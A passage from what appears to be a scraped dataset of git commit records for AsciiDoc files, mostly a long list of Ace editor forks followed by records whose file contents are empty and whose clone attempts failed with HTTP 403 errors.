/ace,paladox\/ace,mdinger\/ace,IChocolateKapa\/ace,sekcheong\/ace,qweasd1\/ace,derekja\/ace,dudb\/ace,thsunmy\/ace,luvegt\/ace,Amrit01\/ace,likitha\/ace,skynetbot\/ace,EthanK28\/ace,sevin7676\/ace,taylorleh\/ace,erezarnon\/ace,Nicholas-Westley\/ace,swong15\/ace-fork,shidao-fm\/ace,PatrickTo\/ace,zl352773277\/ace,mlajtos\/ace,erezarnon\/ace,zpzgone\/ace,animack\/ace,dudb\/ace,durai145\/ace,jabgibson\/ace,IChocolateKapa\/ace,multiarc\/ace,EthanK28\/ace,STRd6\/ace,WigWagCo\/ace,thdoan\/ace,kevinkmp\/ace,luvegt\/ace,shamim8888\/ace,jabgibson\/ace,mkosieradzki\/ace,Eynaliyev\/ace,mdinger\/ace,IChocolateKapa\/ace,Khan\/ace,ThiagoGarciaAlves\/ace,Nicholas-Westley\/ace,PatrickTo\/ace,Gottox\/ace,Mabbu9\/ace,sevin7676\/ace,ggalancs\/ace,mrlong\/ace,likitha\/ace,Khan\/ace,sbusso\/ace,skynetbot\/ace,ggalancs\/ace,tranch-xiao\/ace,bcuff\/ace,luvegt\/ace,Eynaliyev\/ace,kevinkmp\/ace,Nicholas-Westley\/ace,bradydowling\/ace,ThiagoGarciaAlves\/ace,tbutter\/ace,zpzgone\/ace,ThiagoGarciaAlves\/ace,JanvanCasteren\/ace,IChocolateKapa\/ace,EthanK28\/ace,sekcheong\/ace,PatrickTo\/ace,mrlong\/ace,thsunmy\/ace,bradparks\/ace,ThiagoGarciaAlves\/ace,2947721120\/ACE,JaroslavMoravec\/ace,makelivedotnet\/ace,Nicholas-Westley\/ace,durai145\/ace,alexbarnsley\/ace,Gottox\/ace,shamim8888\/ace,l3dlp\/ace,bcuff\/ace,JaroslavMoravec\/ace,thsunmy\/ace,zpzgone\/ace,makelivedotnet\/ace,animack\/ace,PatrickTo\/ace,AlphaStaxLLC\/ace,Amrit01\/ace,ezoapp\/aceeditor,397239396\/ace,animack\/ace,wcandillon\/ace,wcandillon\/ace,l3dlp\/ace,bcuff\/ace,likitha\/ace,AaronZhangL\/ace,kevinkmp\/ace,durai145\/ace,ezoapp\/aceeditor,Stackato-Apps\/ace,Stackato-Apps\/ace,durai145\/ace,STRd6\/ace,Eynaliyev\/ace,skylarkcob\/ace,leanprover\/ace,durai145\/ace,skynetbot\/ace,JaroslavMoravec\/ace,itsff\/ace,leanprover\/ace,WigWagCo\/ace,qweasd1\/ace,ezoapp\/aceeditor,kevinkmp\/ace,skynetbot\/ace,derekja\/ace,JanvanCasteren\/ace,alexbarnsley\/ace,erezarnon\/ace,mlajtos\/ace,kevinkmp\/ace,Amrit01\/ace,Khan\/ace,taylorleh\/ace,eranwitkon\/ace,likitha\/ace,dudb\/ace,EthanK28\/ace,paladox\/ace,Amrit01\/ace,zpzgone\/ace,shamim8888\/ace,qweasd1\/ace,mkosieradzki\/ace,sbusso\/ace,mrlong\/ace,JanvanCasteren\/ace,shidao-fm\/ace,ylian\/ace,kevinkmp\/ace,erezarnon\/ace,ylian\/ace,mlajtos\/ace,cintiamh\/ace,kevinkmp\/ace,soonhokong\/lean-ace,gjtorikian\/ace,Mabbu9\/ace,zpzgone\/ace,JanvanCasteren\/ace,WigWagCo\/ace,XCage15\/ace,swong15\/ace-fork,Khan\/ace,shidao-fm\/ace,tranch-xiao\/ace,2947721120\/ACE,makelivedotnet\/ace,leanprover\/ace,leanprover\/ace,AlphaStaxLLC\/ace,jabgibson\/ace,2947721120\/ACE,Amrit01\/ace,erezarnon\/ace,zpzgone\/ace,luvegt\/ace,wcandillon\/ace,jabgibson\/ace,jjatria\/ace,EthanK28\/ace,MarkBandilla\/ace,Gottox\/ace,luvegt\/ace,Amrit01\/ace,EthanK28\/ace,qweasd1\/ace,Stackato-Apps\/ace,ylian\/ace,sevin7676\/ace,sevin7676\/ace,ThiagoGarciaAlves\/ace,CAAL\/ace,Gottox\/ace,Gottox\/ace,patope\/ace,swong15\/ace-fork,STRd6\/ace,zpzgone\/ace,397239396\/ace,bradydowling\/ace,kevinkmp\/ace,mrlong\/ace,l3dlp\/ace,alexbarnsley\/ace,AlphaStaxLLC\/ace,fjakobs\/ace,itsff\/ace,Nicholas-Westley\/ace,PatrickTo\/ace,Amrit01\/ace,skylarkcob\/ace,Gottox\/ace,vgrish\/ace,zl352773277\/ace,alexbarnsley\/ace,tobyreynold\/ace,397239396\/ace,shamim8888\/ace,patope\/ace,EthanK28\/ace,ezoapp\/aceeditor,JaroslavMoravec\/ace,patope\/ace,erezarnon\/ace,patope\/ace,zl352773277\/ace,makelivedotnet\/ace,taylorleh\/ace,soonhokong\/lean-ace,JaroslavMoravec\/ace,jjatria\/ace,tobyreynold\/ace,Gottox\/ace,JanvanCasteren\/ace,397239396\/ace,JaroslavMoravec\/ace,taylorleh\/ace,itsf
f\/ace,PatrickTo\/ace,alexbarnsley\/ace,eranwitkon\/ace,shamim8888\/ace,ezoapp\/aceeditor,EthanK28\/ace,likitha\/ace,tobyreynold\/ace,cintiamh\/ace,ylian\/ace,swong15\/ace-fork,tobyreynold\/ace,robottomw\/ace,MarkBandilla\/ace,2947721120\/ACE,sekcheong\/ace,mlajtos\/ace,dudb\/ace,Khan\/ace,bcuff\/ace,brandonb927\/ace,skylarkcob\/ace,Amrit01\/ace,fjakobs\/ace,durai145\/ace,wende\/alchemide,animack\/ace,animack\/ace,taylorleh\/ace,fjakobs\/ace,XCage15\/ace,AlphaStaxLLC\/ace,ThiagoGarciaAlves\/ace,mkosieradzki\/ace,bradparks\/ace,taylorleh\/ace,gjtorikian\/ace,ggalancs\/ace,itsff\/ace,patope\/ace,eranwitkon\/ace,Stackato-Apps\/ace,bradydowling\/ace,MarkBandilla\/ace,thsunmy\/ace,erezarnon\/ace,itsff\/ace,itsff\/ace,PatrickTo\/ace,ThiagoGarciaAlves\/ace,sbusso\/ace,mlajtos\/ace,qweasd1\/ace,durai145\/ace,tbutter\/ace,taylorleh\/ace,Eynaliyev\/ace,mlajtos\/ace,ektx\/ace,skynetbot\/ace,zl352773277\/ace,skylarkcob\/ace,STRd6\/ace,swong15\/ace-fork,Khan\/ace,fjakobs\/ace,animack\/ace,tbutter\/ace,zl352773277\/ace,Nicholas-Westley\/ace,IChocolateKapa\/ace,derekja\/ace,PatrickTo\/ace,paladox\/ace,AlphaStaxLLC\/ace,XCage15\/ace,skylarkcob\/ace,IChocolateKapa\/ace,STRd6\/ace,mkosieradzki\/ace,Nicholas-Westley\/ace,skylarkcob\/ace,IChocolateKapa\/ace,likitha\/ace,kevinkmp\/ace,soonhokong\/lean-ace,ylian\/ace,vgrish\/ace,mlajtos\/ace,bradydowling\/ace,soonhokong\/lean-ace,AlphaStaxLLC\/ace,bradparks\/ace,ThiagoGarciaAlves\/ace,soonhokong\/lean-ace,IChocolateKapa\/ace,enricoberti\/ace,skynetbot\/ace,WigWagCo\/ace,Amrit01\/ace,multiarc\/ace,luvegt\/ace,ggalancs\/ace,brandonb927\/ace,fjakobs\/ace,ggalancs\/ace,kevinkmp\/ace,IChocolateKapa\/ace,sbusso\/ace,shidao-fm\/ace,jjatria\/ace,STRd6\/ace,bradparks\/ace,AaronZhangL\/ace,leanprover\/ace,sekcheong\/ace,Stackato-Apps\/ace,soonhokong\/lean-ace,skynetbot\/ace,cintiamh\/ace,bradparks\/ace,mdinger\/ace,shamim8888\/ace,paladox\/ace,MarkBandilla\/ace,mdinger\/ace,bradydowling\/ace,Gottox\/ace,tobyreynold\/ace,mlajtos\/ace,EthanK28\/ace,makelivedotnet\/ace,skylarkcob\/ace,sbusso\/ace,bcuff\/ace,shamim8888\/ace,jjatria\/ace,397239396\/ace,sevin7676\/ace,shidao-fm\/ace,dudb\/ace,dudb\/ace,jjatria\/ace,alexbarnsley\/ace,skynetbot\/ace,mrlong\/ace,Mabbu9\/ace,tbutter\/ace,skynetbot\/ace,397239396\/ace,swong15\/ace-fork,wende\/alchemide,bcuff\/ace,cintiamh\/ace,JaroslavMoravec\/ace,mlajtos\/ace,2947721120\/ACE,Stackato-Apps\/ace,IChocolateKapa\/ace,JaroslavMoravec\/ace,mkosieradzki\/ace,wende\/alchemide,swong15\/ace-fork,eranwitkon\/ace,ThiagoGarciaAlves\/ace,AaronZhangL\/ace,sekcheong\/ace,MarkBandilla\/ace,eranwitkon\/ace,Eynaliyev\/ace,animack\/ace,Nicholas-Westley\/ace,XCage15\/ace,shidao-fm\/ace,MarkBandilla\/ace,derekja\/ace,derekja\/ace,Stackato-Apps\/ace,cintiamh\/ace,tobyreynold\/ace,ThiagoGarciaAlves\/ace,ylian\/ace,eranwitkon\/ace,likitha\/ace,leanprover\/ace,tbutter\/ace,swong15\/ace-fork,brandonb927\/ace,leanprover\/ace,JanvanCasteren\/ace,vgrish\/ace,enricoberti\/ace,fjakobs\/ace,zpzgone\/ace,luvegt\/ace,XCage15\/ace,thdoan\/ace,PatrickTo\/ace,patope\/ace,soonhokong\/lean-ace,robottomw\/ace,derekja\/ace,mrlong\/ace,sevin7676\/ace,XCage15\/ace,skylarkcob\/ace,jabgibson\/ace,AaronZhangL\/ace,paladox\/ace,ezoapp\/aceeditor,ezoapp\/aceeditor,kevinkmp\/ace,kevinkmp\/ace,itsff\/ace,ggalancs\/ace,jjatria\/ace,qweasd1\/ace,derekja\/ace,IChocolateKapa\/ace,itsff\/ace,CAAL\/ace,tranch-xiao\/ace,jjatria\/ace,enricoberti\/ace,multiarc\/ace,JaroslavMoravec\/ace,derekja\/ace,bcuff\/ace,likitha\/ace,Mabbu9\/ace,dudb\/ace,sekcheong\/ace,ggalancs\/ace,thdoan\/ace,qweasd
1\/ace,mdinger\/ace,erezarnon\/ace,ThiagoGarciaAlves\/ace,AlphaStaxLLC\/ace,thsunmy\/ace,bradparks\/ace,eranwitkon\/ace,AaronZhangL\/ace,wcandillon\/ace,Stackato-Apps\/ace,erezarnon\/ace,XCage15\/ace,enricoberti\/ace,brandonb927\/ace,shidao-fm\/ace,bradparks\/ace,2947721120\/ACE,ezoapp\/aceeditor,WigWagCo\/ace,PatrickTo\/ace,ggalancs\/ace,alexbarnsley\/ace,tbutter\/ace,wcandillon\/ace,ektx\/ace,eranwitkon\/ace,robottomw\/ace,sbusso\/ace,Gottox\/ace,bradparks\/ace,bradparks\/ace,jjatria\/ace,paladox\/ace,swong15\/ace-fork,wende\/alchemide,ggalancs\/ace,wcandillon\/ace,mrlong\/ace,tranch-xiao\/ace,tobyreynold\/ace,leanprover\/ace,IChocolateKapa\/ace,animack\/ace,taylorleh\/ace,bradparks\/ace,mkosieradzki\/ace,mlajtos\/ace,erezarnon\/ace,l3dlp\/ace,397239396\/ace,leanprover\/ace,sevin7676\/ace,jjatria\/ace,tobyreynold\/ace,enricoberti\/ace,wende\/alchemide,paladox\/ace,leanprover\/ace,Nicholas-Westley\/ace,luvegt\/ace,sevin7676\/ace,multiarc\/ace,enricoberti\/ace,skynetbot\/ace,Mabbu9\/ace,wcandillon\/ace,swong15\/ace-fork,shidao-fm\/ace,fjakobs\/ace,WigWagCo\/ace,shamim8888\/ace,l3dlp\/ace,qweasd1\/ace,wende\/alchemide,AlphaStaxLLC\/ace,ThiagoGarciaAlves\/ace,STRd6\/ace,tranch-xiao\/ace,wcandillon\/ace,fjakobs\/ace,leanprover\/ace,mlajtos\/ace,ezoapp\/aceeditor,makelivedotnet\/ace,thdoan\/ace,luvegt\/ace,l3dlp\/ace,multiarc\/ace,leanprover\/ace,kevinkmp\/ace,bradydowling\/ace,swong15\/ace-fork,tbutter\/ace,fjakobs\/ace,IChocolateKapa\/ace,patope\/ace,sbusso\/ace,likitha\/ace,ThiagoGarciaAlves\/ace,mrlong\/ace,shamim8888\/ace,mdinger\/ace,eranwitkon\/ace,JanvanCasteren\/ace,Nicholas-Westley\/ace,jabgibson\/ace,gjtorikian\/ace,zpzgone\/ace,JaroslavMoravec\/ace,EthanK28\/ace,Mabbu9\/ace,CAAL\/ace,mkosieradzki\/ace,multiarc\/ace,STRd6\/ace,sekcheong\/ace,XCage15\/ace,thdoan\/ace,wende\/alchemide,ezoapp\/aceeditor,ggalancs\/ace,STRd6\/ace,likitha\/ace,fjakobs\/ace,CAAL\/ace,l3dlp\/ace,397239396\/ace,JaroslavMoravec\/ace,erezarnon\/ace,IChocolateKapa\/ace,ylian\/ace,vgrish\/ace,qweasd1\/ace,mrlong\/ace,mrlong\/ace,CAAL\/ace,enricoberti\/ace,makelivedotnet\/ace,thdoan\/ace,ylian\/ace,STRd6\/ace,CAAL\/ace,mrlong\/ace,patope\/ace,Amrit01\/ace,jabgibson\/ace,animack\/ace,sekcheong\/ace,XCage15\/ace,eranwitkon\/ace,soonhokong\/lean-ace,cintiamh\/ace,Mabbu9\/ace,fjakobs\/ace,Gottox\/ace,MarkBandilla\/ace,mlajtos\/ace,enricoberti\/ace,derekja\/ace,Mabbu9\/ace,jjatria\/ace,makelivedotnet\/ace,IChocolateKapa\/ace,wende\/alchemide,skylarkcob\/ace,tranch-xiao\/ace,tranch-xiao\/ace,JaroslavMoravec\/ace,thdoan\/ace,itsff\/ace,AlphaStaxLLC\/ace,l3dlp\/ace,skylarkcob\/ace,qweasd1\/ace,enricoberti\/ace,shidao-fm\/ace,CAAL\/ace,tobyreynold\/ace,thsunmy\/ace,Stackato-Apps\/ace,zpzgone\/ace,sbusso\/ace,ezoapp\/aceeditor,luvegt\/ace,wende\/alchemide,zpzgone\/ace,qweasd1\/ace,Eynaliyev\/ace,AaronZhangL\/ace,makelivedotnet\/ace,eranwitkon\/ace,likitha\/ace,CAAL\/ace,Eynaliyev\/ace,bradydowling\/ace,jabgibson\/ace,wcandillon\/ace,eranwitkon\/ace,durai145\/ace,Eynaliyev\/ace,ggalancs\/ace,CAAL\/ace,cintiamh\/ace,JaroslavMoravec\/ace,bcuff\/ace,Eynaliyev\/ace,blake-regalia\/ace-webapp.js,luvegt\/ace,ylian\/ace,sbusso\/ace,enricoberti\/ace,shamim8888\/ace,sekcheong\/ace,ggalancs\/ace,l3dlp\/ace,ezoapp\/aceeditor,thsunmy\/ace,JaroslavMoravec\/ace,shidao-fm\/ace,mdinger\/ace,patope\/ace,likitha\/ace,wcandillon\/ace,WigWagCo\/ace,eranwitkon\/ace,shidao-fm\/ace,PatrickTo\/ace,shamim8888\/ace,alexbarnsley\/ace,luvegt\/ace,kevinkmp\/ace,CAAL\/ace,Mabbu9\/ace,soonhokong\/lean-ace,jjatria\/ace,skylarkcob\/ace,wcandillon\/ace,WigWag
Co\/ace,PatrickTo\/ace,durai145\/ace,ylian\/ace,thsunmy\/ace,Gottox\/ace,WigWagCo\/ace,vgrish\/ace,qweasd1\/ace,dudb\/ace,zl352773277\/ace,cintiamh\/ace,bradparks\/ace,tobyreynold\/ace,thdoan\/ace,MarkBandilla\/ace,PatrickTo\/ace,CAAL\/ace,gjtorikian\/ace,Eynaliyev\/ace,alexbarnsley\/ace,l3dlp\/ace,WigWagCo\/ace,brandonb927\/ace,alexbarnsley\/ace,bcuff\/ace,brandonb927\/ace,likitha\/ace,ggalancs\/ace,sevin7676\/ace,ylian\/ace,patope\/ace,JanvanCasteren\/ace,patope\/ace,Amrit01\/ace,thsunmy\/ace,Nicholas-Westley\/ace,Stackato-Apps\/ace,397239396\/ace,erezarnon\/ace,AaronZhangL\/ace,AlphaStaxLLC\/ace,PatrickTo\/ace,multiarc\/ace,tbutter\/ace,brandonb927\/ace,CAAL\/ace,enricoberti\/ace,dudb\/ace,bradydowling\/ace,skylarkcob\/ace,likitha\/ace,vgrish\/ace,durai145\/ace,Stackato-Apps\/ace,thsunmy\/ace,bradydowling\/ace,skynetbot\/ace,Eynaliyev\/ace,JanvanCasteren\/ace,sbusso\/ace,vgrish\/ace,2947721120\/ACE,sevin7676\/ace,jabgibson\/ace,l3dlp\/ace,gjtorikian\/ace,thdoan\/ace,zl352773277\/ace,derekja\/ace,skylarkcob\/ace,swong15\/ace-fork,ggalancs\/ace,alexbarnsley\/ace,zpzgone\/ace,wende\/alchemide,Gottox\/ace,EthanK28\/ace,multiarc\/ace,bradydowling\/ace,mdinger\/ace,397239396\/ace,sekcheong\/ace,skynetbot\/ace,AaronZhangL\/ace,itsff\/ace,bradparks\/ace,wcandillon\/ace,CAAL\/ace,cintiamh\/ace,makelivedotnet\/ace,JanvanCasteren\/ace,shidao-fm\/ace,cintiamh\/ace,kevinkmp\/ace,zpzgone\/ace,2947721120\/ACE,JanvanCasteren\/ace,sekcheong\/ace,makelivedotnet\/ace,paladox\/ace,vgrish\/ace,derekja\/ace,ylian\/ace,brandonb927\/ace,shamim8888\/ace,sekcheong\/ace,2947721120\/ACE,Mabbu9\/ace,zpzgone\/ace,jabgibson\/ace,wende\/alchemide,dudb\/ace,tbutter\/ace,tranch-xiao\/ace,MarkBandilla\/ace,Eynaliyev\/ace,jabgibson\/ace,WigWagCo\/ace,2947721120\/ACE,Gottox\/ace,397239396\/ace,CAAL\/ace,durai145\/ace,mlajtos\/ace,sekcheong\/ace,thsunmy\/ace,Khan\/ace,animack\/ace,XCage15\/ace,397239396\/ace,jjatria\/ace,jabgibson\/ace,tobyreynold\/ace,2947721120\/ACE,sevin7676\/ace,makelivedotnet\/ace,zl352773277\/ace,skynetbot\/ace,sevin7676\/ace,sekcheong\/ace,397239396\/ace,paladox\/ace,2947721120\/ACE,Nicholas-Westley\/ace,CAAL\/ace,taylorleh\/ace,leanprover\/ace,leanprover\/ace,enricoberti\/ace,multiarc\/ace,animack\/ace,cintiamh\/ace,cintiamh\/ace,2947721120\/ACE,Khan\/ace,bcuff\/ace,tobyreynold\/ace,PatrickTo\/ace,multiarc\/ace,zpzgone\/ace,wende\/alchemide,tranch-xiao\/ace,tobyreynold\/ace,erezarnon\/ace,taylorleh\/ace,XCage15\/ace,qweasd1\/ace,tobyreynold\/ace,mrlong\/ace,tbutter\/ace,sevin7676\/ace,IChocolateKapa\/ace,thsunmy\/ace,sbusso\/ace,mkosieradzki\/ace,Khan\/ace,makelivedotnet\/ace,jjatria\/ace,bradparks\/ace,ylian\/ace,brandonb927\/ace,mrlong\/ace,Mabbu9\/ace,JanvanCasteren\/ace,ThiagoGarciaAlves\/ace,mkosieradzki\/ace,2947721120\/ACE,bradparks\/ace,luvegt\/ace,Nicholas-Westley\/ace,tranch-xiao\/ace,MarkBandilla\/ace,ThiagoGarciaAlves\/ace,shidao-fm\/ace,Amrit01\/ace,Eynaliyev\/ace,zl352773277\/ace,eranwitkon\/ace,ylian\/ace,gjtorikian\/ace,derekja\/ace,eranwitkon\/ace,thdoan\/ace,zpzgone\/ace,AaronZhangL\/ace,XCage15\/ace,EthanK28\/ace,MarkBandilla\/ace,enricoberti\/ace,JaroslavMoravec\/ace,soonhokong\/lean-ace,mdinger\/ace,eranwitkon\/ace,animack\/ace,tranch-xiao\/ace,EthanK28\/ace,durai145\/ace,taylorleh\/ace,alexbarnsley\/ace,leanprover\/ace,multiarc\/ace,cintiamh\/ace,gjtorikian\/ace,ezoapp\/aceeditor,MarkBandilla\/ace,brandonb927\/ace,Stackato-Apps\/ace,taylorleh\/ace,wende\/alchemide,vgrish\/ace,Mabbu9\/ace,WigWagCo\/ace,sekcheong\/ace,JanvanCasteren\/ace,skynetbot\/ace,itsff\/ace,Khan\/ace,Gottox\
/ace,dudb\/ace,WigWagCo\/ace,derekja\/ace,tranch-xiao\/ace,AlphaStaxLLC\/ace,enricoberti\/ace,ggalancs\/ace,skylarkcob\/ace,bradydowling\/ace,qweasd1\/ace,patope\/ace,WigWagCo\/ace,gjtorikian\/ace,zl352773277\/ace,swong15\/ace-fork,thdoan\/ace,animack\/ace,brandonb927\/ace,Gottox\/ace,fjakobs\/ace,eranwitkon\/ace,XCage15\/ace,thsunmy\/ace,bcuff\/ace,jabgibson\/ace,Eynaliyev\/ace,sevin7676\/ace,swong15\/ace-fork,shamim8888\/ace,MarkBandilla\/ace,erezarnon\/ace,brandonb927\/ace,soonhokong\/lean-ace,fjakobs\/ace,wcandillon\/ace,thsunmy\/ace,paladox\/ace,STRd6\/ace,mlajtos\/ace,enricoberti\/ace,skynetbot\/ace,fjakobs\/ace,Eynaliyev\/ace,bcuff\/ace,qweasd1\/ace,tbutter\/ace,taylorleh\/ace,soonhokong\/lean-ace,durai145\/ace,STRd6\/ace,patope\/ace,wcandillon\/ace,fjakobs\/ace,shamim8888\/ace,mkosieradzki\/ace,Khan\/ace,ggalancs\/ace,wcandillon\/ace,Eynaliyev\/ace,mkosieradzki\/ace,jjatria\/ace,sekcheong\/ace,brandonb927\/ace,luvegt\/ace,animack\/ace,zl352773277\/ace,jabgibson\/ace,vgrish\/ace,erezarnon\/ace,bradydowling\/ace,shidao-fm\/ace,skynetbot\/ace,durai145\/ace,WigWagCo\/ace,Mabbu9\/ace,dudb\/ace,mdinger\/ace,alexbarnsley\/ace,CAAL\/ace,animack\/ace,cintiamh\/ace,Eynaliyev\/ace,tranch-xiao\/ace,2947721120\/ACE,XCage15\/ace,qweasd1\/ace,paladox\/ace,AaronZhangL\/ace,durai145\/ace,bcuff\/ace,makelivedotnet\/ace,alexbarnsley\/ace,patope\/ace,tbutter\/ace,Amrit01\/ace,397239396\/ace,WigWagCo\/ace,397239396\/ace,bcuff\/ace,Nicholas-Westley\/ace,multiarc\/ace,Stackato-Apps\/ace,soonhokong\/lean-ace,bcuff\/ace,paladox\/ace,ektx\/ace,kevinkmp\/ace,bradparks\/ace,Amrit01\/ace,IChocolateKapa\/ace,bradparks\/ace,zl352773277\/ace,Mabbu9\/ace,likitha\/ace,bradparks\/ace,skylarkcob\/ace,mlajtos\/ace,mdinger\/ace,JaroslavMoravec\/ace,gjtorikian\/ace,patope\/ace,skylarkcob\/ace,XCage15\/ace,leanprover\/ace,zl352773277\/ace,397239396\/ace,shamim8888\/ace,multiarc\/ace,ThiagoGarciaAlves\/ace,leanprover\/ace,397239396\/ace,bradydowling\/ace,erezarnon\/ace,Amrit01\/ace,ezoapp\/aceeditor,Nicholas-Westley\/ace,gjtorikian\/ace,AaronZhangL\/ace,sbusso\/ace,sbusso\/ace,brandonb927\/ace,itsff\/ace,PatrickTo\/ace,wende\/alchemide,enricoberti\/ace,sevin7676\/ace,gjtorikian\/ace,mkosieradzki\/ace,dudb\/ace,Stackato-Apps\/ace,STRd6\/ace,mdinger\/ace,AlphaStaxLLC\/ace,tranch-xiao\/ace,zl352773277\/ace,sevin7676\/ace,kevinkmp\/ace,gjtorikian\/ace,sbusso\/ace,mkosieradzki\/ace,sbusso\/ace,tbutter\/ace,cintiamh\/ace,Mabbu9\/ace,taylorleh\/ace,derekja\/ace,sevin7676\/ace,durai145\/ace,erezarnon\/ace,2947721120\/ACE,jabgibson\/ace,animack\/ace,l3dlp\/ace,durai145\/ace,bradydowling\/ace,multiarc\/ace,fjakobs\/ace,taylorleh\/ace,paladox\/ace,mrlong\/ace,Eynaliyev\/ace,ggalancs\/ace,ThiagoGarciaAlves\/ace,mkosieradzki\/ace,zl352773277\/ace,wende\/alchemide,shidao-fm\/ace,bradydowling\/ace,durai145\/ace,itsff\/ace,Khan\/ace,animack\/ace,brandonb927\/ace,Stackato-Apps\/ace,JanvanCasteren\/ace,AlphaStaxLLC\/ace,Mabbu9\/ace,2947721120\/ACE,Nicholas-Westley\/ace,tobyreynold\/ace,patope\/ace,mdinger\/ace,JanvanCasteren\/ace,zpzgone\/ace,AaronZhangL\/ace,thsunmy\/ace,mkosieradzki\/ace,gjtorikian\/ace,Stackato-Apps\/ace,brandonb927\/ace,Gottox\/ace,jjatria\/ace,PatrickTo\/ace,likitha\/ace,mkosieradzki\/ace,WigWagCo\/ace,tobyreynold\/ace,erezarnon\/ace,soonhokong\/lean-ace,l3dlp\/ace,dudb\/ace,jabgibson\/ace,brandonb927\/ace,zpzgone\/ace,AlphaStaxLLC\/ace,Mabbu9\/ace,JaroslavMoravec\/ace,thdoan\/ace,MarkBandilla\/ace,mlajtos\/ace,STRd6\/ace,luvegt\/ace,vgrish\/ace,ezoapp\/aceeditor,dudb\/ace,MarkBandilla\/ace,skynetbot\/ace,derekja\/ace,
ylian\/ace,MarkBandilla\/ace,sevin7676\/ace,gjtorikian\/ace,tbutter\/ace,Nicholas-Westley\/ace,alexbarnsley\/ace,enricoberti\/ace,AaronZhangL\/ace,mkosieradzki\/ace,ezoapp\/aceeditor,AaronZhangL\/ace,makelivedotnet\/ace,taylorleh\/ace,animack\/ace,AlphaStaxLLC\/ace,mrlong\/ace,paladox\/ace,jjatria\/ace,Khan\/ace,shamim8888\/ace,tobyreynold\/ace,multiarc\/ace,Stackato-Apps\/ace,multiarc\/ace,JanvanCasteren\/ace,zl352773277\/ace,taylorleh\/ace,bcuff\/ace,fjakobs\/ace,shidao-fm\/ace,derekja\/ace,AaronZhangL\/ace,acanakoglu\/ace,vgrish\/ace,Khan\/ace,skylarkcob\/ace,wcandillon\/ace,Nicholas-Westley\/ace,soonhokong\/lean-ace,luvegt\/ace,zl352773277\/ace,shamim8888\/ace,Amrit01\/ace,EthanK28\/ace,ylian\/ace,JaroslavMoravec\/ace,MarkBandilla\/ace,alexbarnsley\/ace,tbutter\/ace,tobyreynold\/ace,cintiamh\/ace,CAAL\/ace,mdinger\/ace,jjatria\/ace,skynetbot\/ace,XCage15\/ace,itsff\/ace,itsff\/ace,MarkBandilla\/ace,wcandillon\/ace,mrlong\/ace","old_file":"demo\/kitchen-sink\/docs\/AsciiDoc.asciidoc","new_file":"demo\/kitchen-sink\/docs\/AsciiDoc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjatria\/ace.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e66a75ec66ac72e7e001a3b810918bb5c7788861","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c049f0ff4e8920821c2fc40fd95eb65e393ed351","subject":"Update 2018-07-09-P-H-P-C-S-Fixer-Git.adoc","message":"Update 2018-07-09-P-H-P-C-S-Fixer-Git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-09-P-H-P-C-S-Fixer-Git.adoc","new_file":"_posts\/2018-07-09-P-H-P-C-S-Fixer-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91fc197555938903cc8cfa26aa1d1bcd65fe97b7","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f93e97a676a93db33b8dc57e0f9d2be8147a189","subject":"docs: add warning to wait between FS rebuilds","message":"docs: add warning to wait between FS rebuilds\n\nCustomers who are rebuilding multiple Kudu nodes may permanently delete\nall healthy replicas for a tablet. 
This won't prevent data loss in the\nevent that a only single copy remains and is deleted, but waiting should\nhelp prevent such situations.\n\nChange-Id: I5659c2ba05a0a6b9905213c5df6ba0dcb371f312\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9279\nReviewed-by: Alex Rodoni <b46da68bf9b818cec7052f7cdfe9b3e69485676b@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The 